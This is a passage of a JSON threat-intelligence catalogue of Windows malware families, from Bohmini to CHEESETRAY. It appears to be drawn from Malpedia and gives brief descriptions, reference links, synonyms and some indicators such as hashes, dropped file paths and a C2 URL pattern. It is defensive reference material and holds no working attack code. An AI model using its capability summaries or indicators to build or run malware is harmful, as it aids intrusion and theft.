"https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini" ], "synonyms": [], "type": [] }, "uuid": "444ca9d1-7128-40fa-9665-654194dfbe0b", "value": "Bohmini" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek", "https://securelist.com/kbot-sometimes-they-come-back/96157/", "http://www.cert.pl/news/11379", "https://lokalhost.pl/txt/newest_addition_to_happy_family_kbot.17.05.2015.txt" ], "synonyms": [ "KBOT" ], "type": [] }, "uuid": "d3af810f-e657-409c-b821-4b1cf727ad18", "value": "Bolek" }, { "description": "FireEye describes BOOSTWRITE as a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate ‘Dwrite.dll’ provided by the Microsoft DirectX Typography Services. The application loads the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads ‘Dwrite’. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.boostwrite", "https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" ], "synonyms": [], "type": [] }, "uuid": "a24eb119-d526-4aa4-ab5f-171ccddd4fbc", "value": "BOOSTWRITE" }, { "description": "BOOTWRECK is a master boot record wiper malware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bootwreck", "https://content.fireeye.com/apt/rpt-apt38", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-latin-american-financial-organizations-again/" ], "synonyms": [ "MBRkiller" ], "type": [] }, "uuid": "174b9314-765e-44d0-a761-10d352f4466c", "value": "BOOTWRECK" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.borr", "https://twitter.com/ViriBack/status/1222704498923032576", "https://github.com/onek1lo/Borr-Stealer", "https://telegra.ph/Borr-Malware-02-04" ], "synonyms": [], "type": [] }, "uuid": "e016e652-8d02-45c4-a268-fe4c588ebd3d", "value": "Borr" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bouncer", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "80487bca-7629-4cb2-bf5b-993d5568b699", "value": "Bouncer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok", "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html", "https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe" ], "synonyms": [], "type": [] }, "uuid": "f9d0e934-879c-4668-b959-6bf7bdc96f5d", "value": "Bozok" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brain", "https://www.welivesecurity.com/2017/01/18/flashback-wednesday-pakistani-brain/" ], "synonyms": [], "type": [] }, "uuid": "1619ee64-fc54-47c0-8ee1-8b786fefc0fd", "value": "BRAIN" }, { "description": "Brambul is a worm that spreads by using a list of hard-coded login credentials to launch a brute-force password attack against an SMB protocol for access to a victim’s networks.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul", "https://www.us-cert.gov/ncas/alerts/TA18-149A", "https://www.secureworks.com/research/threat-profiles/nickel-academy", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/", "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1", "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-2", "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf" ], "synonyms": [ "SORRYBRUTE" ], "type": [] }, "uuid": "d97ae60e-612a-4feb-908a-8c4d32e9d763", "value": "Brambul" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bravonc", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" ], "synonyms": [], "type": [] }, "uuid": "fbed27da-551d-4793-ba7e-128256326909", "value": "BravoNC" }, { "description": "This is a backdoor which FireEye call the Breach Remote Administration Tool (BreachRAT), written in C++. The malware name is derived from the hardcoded PDB path found in the RAT: C:\\Work\\Breach Remote Administration Tool\\Release\\Client.pdb", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.breach_rat", "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html" ], "synonyms": [], "type": [] }, "uuid": "52cf2986-89e8-463d-90b6-e4356c9777e7", "value": "BreachRAT" }, { "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader" ], "synonyms": [], "type": [] }, "uuid": "a05b8e4b-a686-439f-8094-037fbcda52bd", "value": "Breakthrough" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab", "https://securelist.com/end-of-the-line-for-the-bredolab-botnet/36335/", "https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html" ], "synonyms": [], "type": [] }, "uuid": "55d343a1-7e80-4254-92eb-dfb433b91a90", "value": "Bredolab" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.broler", "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf" ], "synonyms": [ "down_new" ], "type": [] }, "uuid": "9a544700-13e3-490f-ae4e-45b3fd159546", "value": "BROLER" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brushaloader", "https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html", "https://www.proofpoint.com/us/threat-insight/post/brushaloader-still-sweeping-victims-one-year-later", "https://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/" ], "synonyms": [], "type": [] }, "uuid": "75a03c4f-8a97-4fc0-a69e-b2e73e4564fc", "value": "BrushaLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brutpos", "https://www.fireeye.com/blog/threat-research/2014/07/brutpos-rdp-bruteforcing-botnet-targeting-pos-systems.html" ], "synonyms": [], "type": [] }, "uuid": "e413c33a-badd-49a1-8d44-c9a0983b5151", "value": "BrutPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005", "https://github.com/nccgroup/Royal_APT", "https://www.secureworks.com/research/threat-profiles/bronze-palace", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], "type": [] }, "uuid": "35e00ff0-704e-4e61-b9bb-9ed20a4a008f", "value": "BS2005" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware", "https://www.bleepingcomputer.com/news/security/new-nuclear-btcware-ransomware-released-updated/" ], "synonyms": [], "type": [] }, "uuid": "d29786c6-2cc0-4e2f-97b0-242a1d9e9bf8", "value": "BTCWare" }, { "description": "BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bubblewrap", "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", "https://attack.mitre.org/software/S0043/" ], "synonyms": [], "type": [] }, "uuid": "d114ee6c-cf7d-408a-8077-d59e736f5a66", "value": "BUBBLEWRAP" }, { "description": "Buer is a downloader sold on underground forums and used by threat actors to deliver payload malware onto target machines. It has been observed in email campaigns and has been sold as a service since August 2019.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buer", "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://blog.minerva-labs.com/stopping-buerloader", "https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/", "https://twitter.com/StopMalvertisin/status/1182505434231398401", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://krabsonsecurity.com/2019/12/05/buer-loader-new-russian-loader-on-the-market-with-interesting-persistence/", "https://www.proofpoint.com/us/threat-insight/post/buer-new-loader-emerges-underground-marketplace", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/", "https://twitter.com/SophosLabs/status/1321844306970251265", "https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/" ], "synonyms": [ "Buerloader" ], "type": [] }, "uuid": "b908173c-c89e-400e-b69d-da411120dae2", "value": "Buer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buffetline", "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", "https://www.us-cert.gov/ncas/analysis-reports/ar20-045f" ], "synonyms": [], "type": [] }, "uuid": "eca37457-cdd4-44c7-ad07-7a4a863e8765", "value": "BUFFETLINE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap", "https://malware-research.org/carbanak-source-code-leaked/", "https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack", "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/", "https://www.welivesecurity.com/2019/07/11/buhtrap-zero-day-espionage-campaigns/", "https://www.scythe.io/library/threatthursday-buhtrap", "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8e498912-44f8-4ea0-ac50-4544f0fedd6c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/", "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf", "https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code", "https://blog.dcso.de/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/", "https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/" ], "synonyms": [ "Ratopak" ], "type": [] }, "uuid": "fa278536-8293-4717-86b5-8a03aa11063f", "value": "Buhtrap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner", "https://www.f-secure.com/weblog/archives/00002249.html", "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf" ], "synonyms": [ "0zapftis", "R2D2" ], "type": [] }, "uuid": "04aeda9f-7923-45d1-ab74-9dddd8612d47", "value": "Bundestrojaner" }, { "description": "Bunitu is a trojan that exposes infected computers to be used as a proxy for remote clients. It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g.VIP72).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu", "https://malwarebreakdown.com/2018/03/21/fobos-malvertising-campaign-delivers-bunitu-proxy-trojan-via-rig-ek/", "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/", "http://malware-traffic-analysis.net/2017/05/09/index.html", "https://broadanalysis.com/2019/04/12/rig-exploit-kit-delivers-bunitu-malware/", "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/", "https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/" ], "synonyms": [], "type": [] }, "uuid": "4350b52a-8100-49b5-848d-d4a4029e949d", "value": "Bunitu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buterat", "http://antivirnews.blogspot.com/2011/01/backdoorwin32-buteratafj.html" ], "synonyms": [ "spyvoltar" ], "type": [] }, "uuid": "cd4ee7f0-394e-4129-a1dc-d5fb423f2311", "value": "Buterat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Yimfoca.A" ], "synonyms": [ "Yimfoca" ], "type": [] }, "uuid": "69a3e0ed-1727-4a9c-ae21-1e32322ede93", "value": "Buzus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby", "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan", "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/", "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia/" ], "synonyms": [], "type": [] }, "uuid": "12886243-55b6-4864-bf7a-7e2439e3a4c1", "value": "BYEBY" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0" ], "synonyms": [], "type": [] }, "uuid": "b6b187d0-e19f-489a-91c0-7c94519555f6", "value": "c0d0so0" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart" ], "synonyms": [], "type": [] }, "uuid": "fe1d51d8-f0e8-4f71-bf5c-724f7d4a824c", "value": "CabArt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy", "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf", "https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets" ], "synonyms": [ "Cadelle" ], "type": [] }, "uuid": "cad83c5e-2081-4ab4-81c7-32cfc16eae66", "value": "CadelSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.calmthorn", "https://www.youtube.com/watch?v=3cUWjojQXWE", "https://www.datanet.co.kr/news/articleView.html?idxno=133346", "https://twitter.com/8th_grey_owl/status/1357550261963689985" ], "synonyms": [], "type": [] }, "uuid": "52c0b49b-d57e-400d-8808-a00d4171ac05", "value": "CALMTHORN" }, { "description": "There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :\r\n\r\nCamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479\r\n\r\nDropped Files on disk :\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8\r\n\r\nC:\\ProgramData\\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190\r\n\r\nProtecao.exe try to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi\r\n\r\nA new driver is installed : C:\\Windows\\system32\\drivers\\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8\r\n\r\nftusbload2.sys set 28 IRP handlers.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.camubot", "https://securityintelligence.com/camubot-new-financial-malware-targets-brazilian-banking-customers/" ], "synonyms": [], "type": [] }, "uuid": "ecac83ab-cd64-4def-979a-40aeeca0400b", "value": "CamuBot" }, { "description": "Cannibal Rat is a python written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. The RAT is distributed in a py2exe format, with the python27.dll and the python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cannibal_rat", "http://blog.talosintelligence.com/2018/02/cannibalrat-targets-brazil.html" ], "synonyms": [], "type": [] }, "uuid": "1e722d81-085e-4beb-8901-aa27fe502dba", "value": "Cannibal Rat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cannon", "https://www.vkremez.com/2018/11/lets-learn-in-depth-on-sofacy-canon.html", "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/" ], "synonyms": [], "type": [] }, "uuid": "3fada5b6-0b3d-4b83-97c9-2157c959704c", "value": "Cannon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak", "https://threatintel.blog/OPBlueRaven-Part1/", "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-three-behind-the-backdoor.html", "https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwqyhe", "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/", "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.secureworks.com/research/threat-profiles/gold-niagara", "https://www.brighttalk.com/webcast/15591/382191/fin7-apt-how-billion-dollar-crime-ring-remains-active-after-leaders-arrest", "https://threatintel.blog/OPBlueRaven-Part2/", "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-two-continuing-source-code-analysis.html", "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-four-desktop-video-player.html", "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html" ], "synonyms": [ "Anunak" ], "type": [] }, "uuid": "8c246ec4-eaa5-42c0-b137-29f28cbb6832", "value": "Carbanak" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp", "https://blog.avast.com/2013/04/08/carberp_epitaph/", "https://web.archive.org/web/20150713145858/http://www.rsaconference.com/writable/presentations/file_upload/ht-t06-dissecting-banking-trojan-carberp_copy1.pdf", "https://cdn1.esetstatic.com/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.pdf" ], "synonyms": [], "type": [] }, "uuid": "8f0d4866-7c67-4376-a6f2-958224d3c9d0", "value": "Carberp" }, { "description": "Cardinal RAT is a remote access Trojan capable of stealing username and credentials, cleaning out cookies from browsers, keylogging and capturing screenshots on targeted systems. It is delivered via a downloader dubbed “Carp” which uses malicious macros in Microsoft Excel documents to compile embedded source code into an executable, which then deploys the Cardinal RAT malware family.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412", "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf", "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/" ], "synonyms": [], "type": [] }, "uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e", "value": "Cardinal RAT" }, { "description": "CARROTBALL is a simple FTP downloader built to deploy SYSCON, a Remote Access Trojan used by the same threat actor. Discovered by Unit 42 in late 2019, the downloader was adopted for use in spear phishing attacks against US government agencies.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotball", "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/" ], "synonyms": [], "type": [] }, "uuid": "cca82b51-fef9-4f33-a2f5-418b80d0966d", "value": "CARROTBALL" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotbat", "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/", "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/" ], "synonyms": [], "type": [] }, "uuid": "4ad06a5f-12e6-44ae-9547-98ee62114357", "value": "CarrotBat" }, { "description": "ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.casper", "https://www.welivesecurity.com/2015/03/05/casper-malware-babar-bunny-another-espionage-cartoon/" ], "synonyms": [], "type": [] }, "uuid": "3198501e-0ff0-43b7-96f0-321b463ab656", "value": "Casper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.catchamas", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" ], "synonyms": [], "type": [] }, "uuid": "8060dbdc-cf31-40bc-9900-eb8119423c50", "value": "Catchamas" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor", "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities", "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/", "http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/", "https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident", "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html", "https://www.secureworks.com/research/threat-profiles/bronze-atlas", "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf", "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/", "https://risky.biz/whatiswinnti/", "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf", "https://blog.avast.com/progress-on-ccleaner-investigation", "https://www.wired.com/story/ccleaner-malware-targeted-tech-firms", "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", "https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer", "https://twitter.com/craiu/status/910148928796061696", "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident", "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor", "https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/", "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html" ], "synonyms": [ "DIRTCLEANER" ], "type": [] }, "uuid": "c51ee09b-fc2d-41fd-a43b-426a4f337139", "value": "CCleaner Backdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.centerpos", "https://www.fireeye.com/blog/threat-research/2016/01/centerpos_an_evolvi.html" ], "synonyms": [ "cerebrus" ], "type": [] }, "uuid": "fca8c5e0-4fef-408c-bcd7-9826271e8e5d", "value": "CenterPOS" }, { "description": "A prolific ransomware which originally added \".cerber\" as a file extension to encrypted files. Has undergone multiple iterations in which the extension has changed. Uses a very readily identifiable set of of UDP activity to checkin and report infections. Primarily uses TOR for payment information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber", "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/", "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/" ], "synonyms": [], "type": [] }, "uuid": "79a7203a-6ea5-4c39-abd4-faa20cf8821a", "value": "Cerber" }, { "description": "This malware family delivers its artifacts packed with free and generic packers. It writes files to windows temporary folders, downloads additional malware (generally cryptominers) and deletes itself.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerbu_miner" ], "synonyms": [], "type": [] }, "uuid": "ba7706c1-7d2a-4031-9acc-cb862860da1a", "value": "Cerbu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chainshot", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-slicing-dicing-cve-2018-5002-payloads-new-chainshot-malware/", "https://www.vice.com/en_us/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec", "https://www.icebrg.io/blog/adobe-flash-zero-day-targeted-attack" ], "synonyms": [], "type": [] }, "uuid": "36f9a5e0-9a78-4b9a-9072-1596c91b59b6", "value": "Chainshot" }, { "description": "According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim’s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chaperone", "https://securelist.com/project-tajmahal/90240/", "https://github.com/TheEnergyStory/malware_analysis/tree/master/TajMahal", "https://securelist.com/apt-trends-report-q2-2019/91897/" ], "synonyms": [ "Taj Mahal" ], "type": [] }, "uuid": "e4027aaa-de86-48ea-8567-c215cdb88ec1", "value": "Chaperone" }, { "description": "CHCH is a Ransomware spotted in the wild in December 2019. It encrypts victim files and adds the extension .chch to them while it drops a ransomware note named: READ_ME.TXT", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chch", "https://twitter.com/GrujaRS/status/1205566219971125249" ], "synonyms": [], "type": [] }, "uuid": "22b03600-505c-41d4-ba1c-45d70cc2e123", "value": "CHCH Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chches", "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html", "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", "https://www.jpcert.or.jp/magazine/acreport-ChChes.html", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-riverside", "https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html" ], "synonyms": [ "HAYMAKER", "Ham Backdoor" ], "type": [] }, "uuid": "6eee9bf9-ffce-4c88-a5ad-9d80f6fc727c", "value": "ChChes" }, { "description": "CHEESETRAY is a sophisticated proxy-aware backdoor that can operate in both active and passive mode depending on the passed command-line parameters. The backdoor is capable of enumerating files and processes, enumerating drivers, enumerating remote desktop sessions, uploading and downloading files, creating and terminating processes, deleting files, creating a reverse shell, acting as a proxy server, and hijacking processes among its other functionality. The backdoor communicates with its C&C server using a custom binary protocol over TCP with port specified as a command-line parameter.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cheesetray", "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", 